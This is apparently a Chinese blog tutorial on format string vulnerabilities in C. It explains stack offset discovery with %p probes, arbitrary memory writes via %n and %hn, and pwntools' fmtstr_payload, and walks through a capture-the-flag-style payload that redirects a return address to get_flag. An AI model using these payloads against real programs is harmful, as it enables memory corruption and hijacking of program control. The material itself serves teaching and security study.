格式化字符串漏洞

原因

格式化字符串漏洞是一种安全漏洞,发生在程序错误地使用格式化函数(如 printfsprintffprintf 等)时,导致攻击者能够读取或修改内存内容。通过这个漏洞,攻击者可以在栈或内存中进行未授权的访问,甚至可以执行任意代码。

1. 格式化字符串的基本功能

在 C/C++ 等编程语言中,函数如 printf 使用格式化字符串来输出数据。常见的格式说明符有:

  • %d:输出整数。
  • %s:输出字符串。
  • %x:以十六进制格式输出整数。
  • %n:将已输出的字符数写入指定的内存地址。

这些说明符决定了函数如何解释参数,通常与它们在栈中的位置有关。

2. 漏洞的形成原因

格式化字符串漏洞的根本原因是格式化函数在使用时没有正确地处理或校验格式字符串,允许攻击者通过构造恶意的格式字符串操纵函数的行为。

例如,通常使用 printf 输出数据时,开发者应当传递格式字符串和相应的参数,如:

printf("Value: %d", value);

但如果开发者没有传递格式字符串,而是直接输出用户提供的数据:

printf(user_input);

攻击者可以控制 user_input 的内容,并且可以插入格式化说明符(如 %x%n 等),导致 printf 从栈或内存中读取或写入不应访问的数据。

偏移量计算

使用递增的 %p%x 来打印栈内容

这是最常见的方法,通过打印栈上的内容来找到格式化字符串在栈中的位置。

示例步骤:
  1. 输入格式化字符串: 首先尝试在输入中使用一系列的 %p%x 占位符。例如:
AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p
  1. 查看输出: 观察程序的输出,输出的每个 %p%x 都会打印栈上的一个地址或值。查找你输入的字符串(如 41414141,即 AAAA 的十六进制表示)出现在输出中的位置。

  2. 计算偏移量: 例如,如果你在第 7 个 %p 的输出中看到 41414141,这意味着偏移量是 7,因为在栈上前 6 个值是其他内容,第 7 个值是你输入的字符串。

寻找有意义的值

这种方式同样可以寻找有意义的值,我们可以通过动态调试来找到有意义的值

对易受攻击的程序发送

aaaaaaaa %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p

请添加图片描述

out:

aaaaaaaa 0x7fff962a8620 0x28 0x7f60e3687260 (nil) 0x1999999999999999 0x7fff962a8770 0x7fff962a867c 0x6161616161616161 0x2520702520702520 0x2070252070252070

计算可得偏移为8

任意地址覆盖

利用 %n 覆盖任意地址

攻击者可以利用%n格式说明符将某个值写入指定的内存地址。原理如下:

  1. 确定地址: 攻击者需要确定想要覆盖的内存地址。这通常是通过其他漏洞或内存泄漏来实现的。

  2. 控制格式化字符串: 攻击者构造一个格式化字符串,其中包含指向想要覆盖的地址的指针,以及适当的%n说明符。例如:

    char buffer[100];
    int *target_address = (int *) 0xdeadbeef; // 假设这是我们想写入的地址
    snprintf(buffer, sizeof(buffer), "%x%x%x%x%n", target_address);
    printf(buffer);
    

    在这个例子中,%x%x%x%x将输出一些无关紧要的数据,%n则会将到目前为止输出的字符数量写入target_address

  3. 控制写入的值: 攻击者可以通过调整格式说明符前的输出字符数来控制%n写入的值。例如,使用宽度说明符:

    snprintf(buffer, sizeof(buffer), "%12345x%n", target_address);
    

    这将输出12345个字符,然后将12345写入target_address

pwntools 工具

fmtstr_payload(offset, writes, numbwritten=0, write_size='byte', strategy='fast')
  • offset: 一个整数,表示栈偏移。该偏移量是 printf 函数的参数在栈中的位置,从哪里开始读取格式化字符串参数。
  • writes: 一个字典,表示要写入的地址和值。字典的键是目标内存地址(可以是整数或字节字符串),值是要写入的整数。
  • numbwritten: 一个整数(可选),表示已经写入的字节数。用于调整剩余的字符输出数量。
  • write_size: 字符串(可选),表示写入的大小,可以是 'byte''short''int',分别表示 1 字节、2 字节、4 字节写入。默认是 'byte'
  • strategy: 字符串(可选),表示使用哪种策略来生成 payload。可以是 'fast'(尽可能短的 payload),或 'justwrite'(只生成写入指令)。

示例

%3926c%10$hnaaaa\xc8\xdc\x8bV\xfd\x7f\x00\x00
%3926c
  • %c 是一个格式化字符串标志,表示输出一个字符。在这个上下文中,%3926c 表示向 printf 函数输出 3926 (0xf56)个字符。
%10$hn
  • %10$hn 是一个格式化说明符,它表示“将写入内容(通常是某个数值)写到第 10 个参数所表示的地址,并且只写入两个字节hn 表示半字写入,16 位)。”
  • %10$:这里的 10$ 指的是传递给 printf 的第 10 个参数。$ 符号用于指定参数的索引。
  • hnhn 是一个格式化说明符,用于执行“半字(2 字节)写入”,也就是说,它只会修改目标地址的低 2 个字节。
aaaa
  • 其目的是确保栈栈对齐
内存情况
  • 攻击前
%8  02:0010│ rdi rsi 0x7ffd93567ec0 ◂— 0x3125633632393325 ('%3926c%1')
%9  03:0018-038     0x7ffd93567ec8 ◂— 0x616161616e682430 ('0$hnaaaa')
%10 04:0020-030     0x7ffd93567ed0 —▸ 0x7ffd93567f08 —▸ 0x55f35a60102c (main+118) ◂— jmp 0x55f35a60104b
  • 攻击后
%8  02:0010│ rdi rsi 0x7ffd93567ec0 ◂— 0x3125633632393325 ('%3926c%1')
%9  03:0018-038     0x7ffd93567ec8 ◂— 0x616161616e682430 ('0$hnaaaa')
%10 04:0020-030     0x7ffd93567ed0 —▸ 0x7ffd93567f08 —▸ 0x55f35a600f56 (get_flag+110) ◂— mov esi, 0

不难看出,0x7ffd93567f08所指向的指针被覆盖了。

一些思路

同层次函数,反回地址存放位置相同
  • 每次调用一个新函数,当前函数的返回地址会被存放在栈上,通常是在调用函数的栈帧中保存。
  • 函数 a 调用 b 时,b 的返回地址会被存放在 a 的栈帧中一个特定位置。
  • b 返回后,a 再调用 cc 的返回地址会存放在栈上同样的位置,因为调用 c 时,b 的栈帧已经被清除,栈的指针返回到 a 的栈帧位置。
  • 同样,当 a 调用 d 时,d 的返回地址也会存放在栈上与 bc 返回地址相同的位置,因为在调用 d 时,c 的栈帧已经被清除,栈指针再次返回到 a 的栈帧。
%1000c会触发printf 的堆申请与释放
  • 27
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
目标检测(Object Detection)是计算机视觉领域的一个核心问题,其主要任务是找出图像中所有感兴趣的目标(物体),并确定它们的类别和位置。以下是对目标检测的详细阐述: 一、基本概念 目标检测的任务是解决“在哪里?是什么?”的问题,即定位出图像中目标的位置并识别出目标的类别。由于各类物体具有不同的外观、形状和姿态,加上成像时光照、遮挡等因素的干扰,目标检测一直是计算机视觉领域最具挑战性的任务之一。 二、核心问题 目标检测涉及以下几个核心问题: 分类问题:判断图像中的目标属于哪个类别。 定位问题:确定目标在图像中的具体位置。 大小问题:目标可能具有不同的大小。 形状问题:目标可能具有不同的形状。 三、算法分类 基于深度学习的目标检测算法主要分为两大类: Two-stage算法:先进行区域生成(Region Proposal),生成有可能包含待检物体的预选框(Region Proposal),再通过卷积神经网络进行样本分类。常见的Two-stage算法包括R-CNN、Fast R-CNN、Faster R-CNN等。 One-stage算法:不用生成区域提议,直接在网络中提取特征来预测物体分类和位置。常见的One-stage算法包括YOLO系列(YOLOv1、YOLOv2、YOLOv3、YOLOv4、YOLOv5等)、SSD和RetinaNet等。 四、算法原理 以YOLO系列为例,YOLO将目标检测视为回归问题,将输入图像一次性划分为多个区域,直接在输出层预测边界框和类别概率。YOLO采用卷积网络来提取特征,使用全连接层来得到预测值。其网络结构通常包含多个卷积层和全连接层,通过卷积层提取图像特征,通过全连接层输出预测结果。 五、应用领域 目标检测技术已经广泛应用于各个领域,为人们的生活带来了极大的便利。以下是一些主要的应用领域: 安全监控:在商场、银行
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值